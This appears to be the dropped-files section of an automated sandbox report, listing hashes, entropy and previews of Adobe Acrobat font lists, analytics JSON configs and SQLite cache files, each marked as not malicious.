                                                                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):295
                                                                                                Entropy (8bit):5.368703429659748
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJM3g98kUwPeUkwRe9:YvXKXqF79Gp0YpW7iQhGMbLUkee9
                                                                                                MD5:7A2F687DF4D9D63299376C6D15207CE0
                                                                                                SHA1:43599D14C7C724A2A91203EFB5E3C66F572335FD
                                                                                                SHA-256:7BB383CA8163D2296232909B04B5A91BCD8258C036100383E2C9826CEFE06810
                                                                                                SHA-512:EDA8C55E544A8558859B5EA3696778270A39345129A9FCBDCCDC44A853CCA12966715B152C2E68C55074E81E5ADB5B99269CAE5FC6FD1B11F215E11B577B9694
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):294
                                                                                                Entropy (8bit):5.31043058823275
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJfBoTfXpnrPeUkwRe9:YvXKXqF79Gp0YpW7iQhGWTfXcUkee9
                                                                                                MD5:8F91852B0D273D06209D1DC3CB3EE384
                                                                                                SHA1:D12C9BF6C6D0F4CE7A9787BA1304FDF26AFF3A13
                                                                                                SHA-256:BB26B218F40FD15809B6088018F74BB300F288CE599F37B558AB9ED955CD664B
                                                                                                SHA-512:818F5314E0DD2CA1C784ED66A2B96EA1A42D57C7248561156F3ED487E8A7BA6447465599A863767728172C7B095B645EEEECACC489688FD6AD7B40E075626212
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):294
                                                                                                Entropy (8bit):5.289136802459629
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJfBD2G6UpnrPeUkwRe9:YvXKXqF79Gp0YpW7iQhGR22cUkee9
                                                                                                MD5:A054F1DA675DB8C9A62823366A6F3837
                                                                                                SHA1:C7459AC8C647EC969CB1FEC2B1AFBAC6269DE54B
                                                                                                SHA-256:0E177A69968FA19F3F4D531564AB308EE654B086E295DDCDF4E120D46307092F
                                                                                                SHA-512:6F7C4350CEF60D88E3AD872E429EE90A6D107A0507CBB664AFB94432DBBC76B1B3A8FA89762C60E768ABAB4A6469EA21ABBF237D86BAB5163648D7FF3E181D31
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):285
                                                                                                Entropy (8bit):5.347783677255528
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJfPmwrPeUkwRe9:YvXKXqF79Gp0YpW7iQhGH56Ukee9
                                                                                                MD5:11885CD7019E280BEF0F419C22CA3CDA
                                                                                                SHA1:03BE61C962A927471764109AE824B113341A00FA
                                                                                                SHA-256:6CE8782A1CEE00CF59CCB7D6FA42798E16BC191E5CA992F314C5D5589B5CFACD
                                                                                                SHA-512:2F6E6286A7D4D1D28EA94996DDEAB3BFD21AA18C6B09938327839B0FEB747784C56221756B8FD42FF76D9517B19CE6474D1518D45547DBA3C8662F811939D1EC
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):1123
                                                                                                Entropy (8bit):5.6885438759013764
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Yv6XOpG3iippLgE9cQx8LennAvzBvkn0RCmK8czOCCS4:YvJiphgy6SAFv5Ah8cv/4
                                                                                                MD5:50376983916A6068EAD46AD48BA2C9CD
                                                                                                SHA1:D0A31A4655DDAF915D6F26438BC2B0C53E8FA543
                                                                                                SHA-256:D2DE4AF8E3BBAE3A19E882F2D42CF11368E4A0B4D475EDC2D15D4F2A81AD9CE9
                                                                                                SHA-512:B46A8E292645796C07B9226FBAA394D3306DAE24F5B9076F14D0CCAE5E1074FCBF72AD1453676E6829F2A66F904B2BBA02358B1E63BB6DF2091F3D9C567B13E0
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.292191136345418
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJf8dPeUkwRe9:YvXKXqF79Gp0YpW7iQhGU8Ukee9
                                                                                                MD5:1CA5A96D0824473E84C4D8435557C3D7
                                                                                                SHA1:B4DDDE610790608FF3FCCF5DA0E7F08DE3A74F4B
                                                                                                SHA-256:8A3A0309F9DC5FB4B4BAB32F7D8908CDE039758CF557DB592436014D64848D54
                                                                                                SHA-512:47BDB094613B53D3A9FBE8CEF25D2FC615E1EAEBA0DCEA373AE777116D03BAA69FDB64D01D5973AC5EBBF5DF58287ADF8121F84C0AB9B6056522B383AF7E630E
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):292
                                                                                                Entropy (8bit):5.2935355632099625
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJfQ1rPeUkwRe9:YvXKXqF79Gp0YpW7iQhGY16Ukee9
                                                                                                MD5:EFD90659ED9CF30BD9538522EB7C651C
                                                                                                SHA1:EACEBD3AB60699E778139B25A8446A613E82C8DE
                                                                                                SHA-256:70312E2512E81288549B4D5D816CCF709B458E8C256B0A01BB7FAE22BB6138F4
                                                                                                SHA-512:26C06DC3860BDA01617436A4963E47A6B30CE7708B09D4FA992445B23A21D8E673C914A1FE1F4188EDEA471B7E941DF8B579B8AD5505B19D5588BB12B7EF1BD6
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.311372258369174
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJfFldPeUkwRe9:YvXKXqF79Gp0YpW7iQhGz8Ukee9
                                                                                                MD5:A3C3C6DC8C094356B45A241DED53270A
                                                                                                SHA1:0D99DB8B53384495147B8BD6913CF8E6A5545732
                                                                                                SHA-256:E72280750C68E0EEE1F5FF8B20A66AE7A18AB5EA63E33236B61500D4773E9EBB
                                                                                                SHA-512:7A8CB5678F51BEC7056424EFE4327A1D85DEAB2B1455A4625236E74841D97DA9EF96CF95CB5BA177C6DEECD1A127B6DA3D0F788F565C7B9E7149537DF0BA1479
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):295
                                                                                                Entropy (8bit):5.319314369674701
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJfzdPeUkwRe9:YvXKXqF79Gp0YpW7iQhGb8Ukee9
                                                                                                MD5:D689F3FA1C4DAADF0164A12D057E03FD
                                                                                                SHA1:705B8849C06F5F39D2284446D7E4A1A8814A0901
                                                                                                SHA-256:2FFF798FE8D4529DE30EFF5406B40669886BAC70A6468DB7777D27A6E9566DEB
                                                                                                SHA-512:2658CFE2E2D87F7F6967032D486ED2E5C0344F51FB2295DA9B4EA1FA6F58E50D532FA023DE72DFE98EA4218C1C73C02F5C14DAC76800503F5D8C75FAB834D9ED
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):289
                                                                                                Entropy (8bit):5.299957089931213
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJfYdPeUkwRe9:YvXKXqF79Gp0YpW7iQhGg8Ukee9
                                                                                                MD5:4DBE25CC40DD00B1BD6EAA6349587A4D
                                                                                                SHA1:E3FACB81751D09CAA1710B0814AFC7FFCB355CFA
                                                                                                SHA-256:EB1C8EF895DFE174C5780C5F4811FEAF7F72126228DB63F1ED50CFF34FD4FA16
                                                                                                SHA-512:CFDC67340C7209AF035685BCC8EC33C582E8FC34904DEEC5EDE811C659A054EE1B652A43F2C895096830CCD1106D918DBF1E026083785F4C782925B5B752CEE4
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):284
                                                                                                Entropy (8bit):5.28600670729513
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJf+dPeUkwRe9:YvXKXqF79Gp0YpW7iQhG28Ukee9
                                                                                                MD5:693F21B742D2362BD76DB23D197DC9FC
                                                                                                SHA1:F565AF05A984D16E4F060F7570C21B881D07BF34
                                                                                                SHA-256:0CED2C4BECFF601C0281911BCA005AB72BE24028932952C824E241A79534C89D
                                                                                                SHA-512:4D4537C192385BA00FCBE596396DA40DBA708AB6A791778482E6A9CF3545282B91628EDB64E5122E79AC514D3E098B1745C52012C0DE6DDC8E3F771735281163
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):291
                                                                                                Entropy (8bit):5.283504482519639
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJfbPtdPeUkwRe9:YvXKXqF79Gp0YpW7iQhGDV8Ukee9
                                                                                                MD5:A69A06C7DAE3394C283985A78C1D43B7
                                                                                                SHA1:2ED54AEFC1FDE29565869B3E54796C864CBDADD7
                                                                                                SHA-256:AA19D99368371EC40D71BF1334C76DE823B35D160929975B0F852C5A565DF7B3
                                                                                                SHA-512:E177A7A9DDF465D2CFF1C0983364CDFE26650CE3E16F2484E46EA9C5A9D795DBE3106B96BFE2A75C67050C7BA3108072AB22EC7FD5FACAECFFD08EDFD8894A00
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):287
                                                                                                Entropy (8bit):5.2851771078635625
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJf21rPeUkwRe9:YvXKXqF79Gp0YpW7iQhG+16Ukee9
                                                                                                MD5:F4CB2241204ECB826E52C819FDC5FC3F
                                                                                                SHA1:2B49E566DD1CA08CC997C4BBA9B66E3A5810904A
                                                                                                SHA-256:4AF1E8ED36268C15C07BF3055A21E6F5E0AAED396B23C4EDB4C0AC0A37E76168
                                                                                                SHA-512:14F837BBB795FAB2DC3AB5AE76A1602E661ABCA629FA7DCB766B970E41D24C78FD16ED7D149B99C9FD02F99A38126D4932921FF063FE98C1EF3C475355570B7F
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):1090
                                                                                                Entropy (8bit):5.659712698048123
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Yv6XOpG3iiZamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS4:YvJilBgkDMUJUAh8cvM4
                                                                                                MD5:22A15581E3D7F6DCB72D18AEC94E04D8
                                                                                                SHA1:FD5CFFEDE94BC7F0865256EF8B3677D3FCD7EC74
                                                                                                SHA-256:250FE18DD0C5FF612C3C5FC682E0BBE6FFA77A5D27EEDFC21EC6F480F312B1C6
                                                                                                SHA-512:8B4521C45A0703730F9555AE0D63AE09A6FF142DE5F4ADD67F84091E363B7D11131F7ED5CB697B16DFD38D3B30EC127E1B454250516406005B2862C6607EA2D9
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):286
                                                                                                Entropy (8bit):5.258650608244312
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJfshHHrPeUkwRe9:YvXKXqF79Gp0YpW7iQhGUUUkee9
                                                                                                MD5:8970C84AD51FEB90CF234671A2AA8F11
                                                                                                SHA1:75A6FC283180ED79456A85282EE51E670AB42CCB
                                                                                                SHA-256:1AD379A9B6A2BF48312873AB88349609F7DDBEB16B362D872F10F8D561A75F15
                                                                                                SHA-512:64AF95542DF43E26C4701D86E13336B35EA1322BA75E67CB6375FA6A9BF3C501AE370E0CD67956331C356356C9D91492F57F8C9231B2234CD99FCE0EE02B1BB4
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):282
                                                                                                Entropy (8bit):5.270187577237669
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:YEQXJ2HXPSBEWSars+eNpR+FIbRI6XVW7+0YrQSoAvJTqgFCrPeUkwRe9:YvXKXqF79Gp0YpW7iQhGTq16Ukee9
                                                                                                MD5:DAFBF5073638E7D01EFC13D4E951E060
                                                                                                SHA1:9D3C2718614CD832145B33F123316A11D9F81581
                                                                                                SHA-256:1E6F7314A9D3F0303D0108CFDB2C5A3064B473ACBA6852F157B83DAF3AE8637E
                                                                                                SHA-512:66ED7100F608DFDBA5DED562DA90770ADC5612563D643C28F920E820D3196D645136B26093390F3A539A864E3B8842A363DDD86AA536C6C2A3556F1D0E43F0AD
                                                                                                Malicious:false
                                                                                                Preview:{"analyticsData":{"responseGUID":"87da35b9-8cd8-4691-b33a-61b7015d8e22","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734685295026,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4
                                                                                                Entropy (8bit):0.8112781244591328
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:e:e
                                                                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                Malicious:false
                                                                                                Preview:....
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):2814
                                                                                                Entropy (8bit):5.136552627047288
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Yao/Xa9u907ayVItZSbuQ6JNdlqJjtYwj0STiN0D2e2LS9CkAwcEOXI5Nkx9Pumt:Ya7iiuQ6/fotYCCNGvHowcEOYA9ht
                                                                                                MD5:080F43AB5587315F5BDD0084A0D8A38D
                                                                                                SHA1:8A02E4459E942B847FF93BDDEF581D0CC25258F6
                                                                                                SHA-256:D3FE65F7C8C3401A458B7C5E1519CF5525153697109EFE5226D76B892CDFEA88
                                                                                                SHA-512:F1DF024F568854A9E765D2CAB5BA56691D595AF040FEE03C53C84A739F45A89E2A7409F2132401F45AD7E9D3A42868DC055B841EE46D321E988ADF59649B02EA
                                                                                                Malicious:false
                                                                                                Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d99117c5d6d9b95c999ffe5e8891e43f","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734510214000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"68b35759f2c2d3e3c8a765f6079eee46","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734510214000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"cd7a6bfc8b888662e00bcc8f8c7ba76b","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734510214000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"4acf03d374c439a1dfd1d382e9e2a7ef","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734510214000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"aaa96856e31a71715680c0c8a388f635","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734510214000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"21e491a6a76247c1b290f228d0d8b388","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                Category:dropped
                                                                                                Size (bytes):12288
                                                                                                Entropy (8bit):0.9843686753670081
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpOQE4zJwtNBwtNbRZ6bRZ47QEF:TVl2GL7ms6ggOVpdzutYtp6PU
                                                                                                MD5:C92ED2AAF680A4A4BF9D50250E2EC476
                                                                                                SHA1:2BA2313D33E7076AAD6401EB4CABB4EB276E0768
                                                                                                SHA-256:47F4335440FE9F2450635321401B692CECFAB3B4731B0A24483E47FA2BE5F60A
                                                                                                SHA-512:7A6058D99245966DBAB344B9ACFBA2E7FDEC7CB9F7716796A4C617305F239E68C1433AF6EA5490AFB1943931E49AA02A82B3A198A1D4FB0BC46250D511392652
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:SQLite Rollback Journal
                                                                                                Category:dropped
                                                                                                Size (bytes):8720
                                                                                                Entropy (8bit):1.3382322098846002
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7+tPAD1RZKHs/Ds/SpOQEPzJwtNBwtNbRZ6bRZWf1RZK7qLBx/XYKQvGJF7urs+:7MPGgOVpGzutYtp6PM+qll2GL7ms+
                                                                                                MD5:55A0DBF507E6FD4B025635DC5AD3D5F6
                                                                                                SHA1:1970696937DD2F66E8B2C06DC5766C6F0A2ED83D
                                                                                                SHA-256:038D366006B6FED2E4FD9452B13C22A600CF606DF0C2E6C7581F106C9AF5B002
                                                                                                SHA-512:9B812E318376E831878BB33EFBC35F3B959A7B5D042DEF25E1D13A90FA55CEDF13310080200076F9FCF166AC35CDC26457579C34661453C5F992A5655B8762F2
                                                                                                Malicious:false
                                                                                                Preview:.... .c.....P........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):66726
                                                                                                Entropy (8bit):5.392739213842091
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:RNOpblrU6TBH44ADKZEgsVGXEYyqqHeex49w7hqhGfuTYyu:6a6TZ44ADEsVIq+e+67hqrK
                                                                                                MD5:01FBDA04F32A605510E17391E115FD08
                                                                                                SHA1:5676B1F453E3CFFE1B14B44622227EA4C839FA94
